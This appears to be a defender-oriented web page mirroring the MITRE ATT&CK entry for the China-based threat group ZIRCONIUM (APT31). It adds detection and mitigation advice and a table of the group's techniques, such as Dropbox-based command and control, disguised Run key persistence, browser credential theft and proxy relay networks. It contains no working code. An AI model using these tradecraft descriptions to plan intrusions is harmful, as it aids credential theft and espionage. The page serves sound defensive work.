G0128: ZIRCONIUM

ATT&CK describes ZIRCONIUM, also known as APT31 and Violet Typhoon, as a China-based threat group active since at least 2017 and associated in reporting with targeting people connected to the 2020 U.S. presidential election and prominent international affairs leaders. For defenders, the useful takeaway is not the name alone: the mapped behaviors span phishing links, user-driven execution, discovery, credential access from browsers, persistence through Run Keys or startup folders, command-and-control over proxies/web services/encryption, tool transfer, and exfiltration over C2 or to cloud storage.

Executive priority

This group profile is most useful for prioritizing readiness around high-value people, politically or diplomatically sensitive work, and organizations where email, identity, endpoint, browser credentials, and cloud storage are business-critical. Leaders should ask whether the organization can prove prevention, detection, and response coverage for spearphishing links, suspicious script and command execution, browser credential theft, persistence changes, and unusual outbound or cloud-storage data movement.

Technical view

ATT&CK provides no group-specific detection text, so SOC and IR teams should validate coverage from the mapped techniques. Focus on Windows-relevant behaviors such as Registry queries, Run Key/startup persistence, cmd.exe, msiexec abuse, browser credential access, and task/service masquerading, while also checking cross-platform telemetry for Python execution, system/user/network discovery, inbound tool transfer, encrypted or proxied C2, and exfiltration to C2 or cloud storage. Detection logic should correlate early access indicators such as spearphishing links and malicious-link execution with follow-on discovery, persistence, credential access, and outbound transfer patterns.

Likely telemetry

Email security and URL-click telemetry for spearphishing links and malicious-link execution
Endpoint process creation, command-line, parent-child process, and script execution telemetry
Windows Registry auditing for discovery and Run Key/startup persistence changes
Service, scheduled task, startup folder, and task-name metadata for masquerading review
Browser credential store access and suspicious file access around browser profile data

Detection direction

Build behavior chains rather than relying on the group name: phishing link or user execution followed by discovery, credential access, persistence, tool transfer, and outbound transfer is higher-value than any single weak signal.
Tune Windows detections for cmd.exe, msiexec.exe, Registry queries, Run Key changes, and browser credential access, with allowlists for legitimate administration and software installation activity.
Review visibility gaps for encrypted C2, legitimate web-service communications, and cloud storage uploads, since these can blend into normal business traffic.
Use masquerading detections that compare task/service names, paths, publishers, and execution context against known-good baselines.
Treat proxy and cloud-service indicators carefully: the ATT&CK mapping supports these behaviors, but source IP attribution and service use alone are not reliable proof of this group.

Mitigation priorities

Prioritize phishing-resistant controls and user reporting workflows for high-risk staff and roles exposed to political, international affairs, or sensitive communications.
Harden endpoint execution paths by controlling script interpreters, command shell abuse, installer proxy execution, startup locations, and unauthorized persistence changes.
Reduce credential exposure by strengthening browser credential policy, endpoint protection, and identity monitoring for suspicious credential use.
Improve egress governance: monitor or restrict unsanctioned cloud storage, unusual external web-service use, and tool-transfer paths while preserving approved business workflows.
Maintain vulnerability and patch discipline because ATT&CK maps the group to exploitation for privilege escalation, but validate priorities against local asset exposure and exploitability.

Analyst notes and limits

The decision value of this ATT&CK object comes from the relationship set: ZIRCONIUM is mapped to initial access through spearphishing links, execution through user action and command/script mechanisms, discovery, persistence, credential access, C2, and exfiltration. This supports a readiness review across SOC monitoring, incident response evidence collection, identity protection, cloud-storage governance, and vulnerability management.

ATT&CK provides no official detection guidance, no platforms on the intrusion-set object itself, and no claim here should be read as evidence of current activity against any specific organization. Platform references in this take come from related ATT&CK techniques, not from a group-level platform field. Local telemetry, exposure, and threat-intelligence validation are required before making risk or attribution judgments.

Official MITRE ATT&CK definition

ZIRCONIUM

ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.[1][2]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Filter related techniques 29 rows

Domain	ID	Name	Relationship / procedure
Enterprise	T1082	System Information Discovery	ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1598	Phishing for Information	ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.CitationGoogle Election Threats October 2020
Enterprise	T1012	Query Registry	ZIRCONIUM has used a tool to query the Registry for proxy settings.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1665	Hide Infrastructure	ZIRCONIUM has utilized an ORB (operational relay box) network – consisting compromised devices such as small office and home office (SOHO) routers, IoT devices, and leased virtual private servers (VPS) – to obfuscate the origin of C2 traffic.CitationORB Mandiant
Enterprise	T1059.003	Windows Command Shell Sub-technique	ZIRCONIUM has used a tool to open a Windows Command Shell on a remote host.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1583.006	Web Services Sub-technique	ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.CitationGoogle Election Threats October 2020CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1584.008	Network Devices Sub-technique	ZIRCONIUM has compromised network devices such as small office and home office (SOHO) routers and IoT devices for ORB (operational relay box) Proxy networks.CitationORB APT31CitationORB Mandiant
Enterprise	T1555.003	Credentials from Web Browsers Sub-technique	ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1059.006	Python Sub-technique	ZIRCONIUM has used Python-based implants to interact with compromised hosts.CitationGoogle Election Threats October 2020CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1547.001	Registry Run Keys / Startup Folder Sub-technique	ZIRCONIUM has created a Registry Run key named `Dropbox Update Setup` to establish persistence for a malicious Python binary.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1573.001	Symmetric Cryptography Sub-technique	ZIRCONIUM has used AES encrypted communications in C2.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1124	System Time Discovery	ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1140	Deobfuscate/Decode Files or Information	ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.CitationCheck Point APT31 February 2021
Enterprise	T1598.003	Spearphishing Link Sub-technique	ZIRCONIUM has used web beacons in e-mails to track hits to attacker-controlled URL's.CitationMicrosoft Targeting Elections September 2020
Enterprise	T1566.002	Spearphishing Link Sub-technique	ZIRCONIUM has used malicious links in e-mails to deliver malware.CitationMicrosoft Targeting Elections September 2020CitationGoogle Election Threats October 2020CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1583.001	Domains Sub-technique	ZIRCONIUM has purchased domains for use in targeted campaigns.CitationMicrosoft Targeting Elections September 2020
Enterprise	T1033	System Owner/User Discovery	ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1090.003	Multi-hop Proxy Sub-technique	ZIRCONIUM has utilized an ORB (operational relay box) network – consisting compromised devices such as small office and home office (SOHO) routers, IoT devices, and leased virtual private servers (VPS) – to proxy traffic.CitationORB Mandiant
Enterprise	T1041	Exfiltration Over C2 Channel	ZIRCONIUM has exfiltrated files via the Dropbox API C2.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1036	Masquerading	ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware.CitationGoogle Election Threats October 2020CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1567.002	Exfiltration to Cloud Storage Sub-technique	ZIRCONIUM has exfiltrated stolen data to Dropbox.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1027.002	Software Packing Sub-technique	ZIRCONIUM has used multi-stage packers for exploit code.CitationCheck Point APT31 February 2021
Enterprise	T1204.001	Malicious Link Sub-technique	ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.CitationGoogle Election Threats October 2020CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1036.004	Masquerade Task or Service Sub-technique	ZIRCONIUM has created a run key named `Dropbox Update Setup` to mask a persistence mechanism for a malicious binary.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1068	Exploitation for Privilege Escalation	ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation.CitationCheck Point APT31 February 2021
Enterprise	T1218.007	Msiexec Sub-technique	ZIRCONIUM has used the msiexec.exe command-line utility to download and execute malicious MSI files.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1105	Ingress Tool Transfer	ZIRCONIUM has used tools to download malicious files to compromised hosts.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1016	System Network Configuration Discovery	ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.CitationZscaler APT31 Covid-19 October 2020
Enterprise	T1102.002	Bidirectional Communication Sub-technique	ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.CitationGoogle Election Threats October 2020CitationZscaler APT31 Covid-19 October 2020

Relationship explorer

All related ATT&CK context

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 2.3
Created: Mar 24, 2021, 15:48 UTC (UTC+00:00)
Modified: Oct 15, 2025, 20:39 UTC (UTC+00:00)
Raw hash: 2d23caddc21c7275...

Imported snapshots across ATT&CK releases (1)

Release	Bundle imported	Object version	Modified	Status	Raw hash
19.1	May 18, 2026, 07:08 UTC (UTC+00:00)	2.3	Oct 15, 2025, 20:39 UTC (UTC+00:00)	Current bundle	`2d23caddc21c…`

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1]
Microsoft Targeting Elections September 2020

Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.
Open source URL
[2]
Check Point APT31 February 2021

Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian – How APT31 Stole and Used an Unknown Equation Group 0-Day. Retrieved March 24, 2021.
Open source URL
[3]
APT31

(Citation: Check Point APT31 February 2021)
[4]
Microsoft Threat Actor Naming July 2023

Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Open source URL
[5]
Violet Typhoon

(Citation: Microsoft Threat Actor Naming July 2023)
[6]
mitre-attack G0128
Open source URL

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use

Analyst context for executives and security teams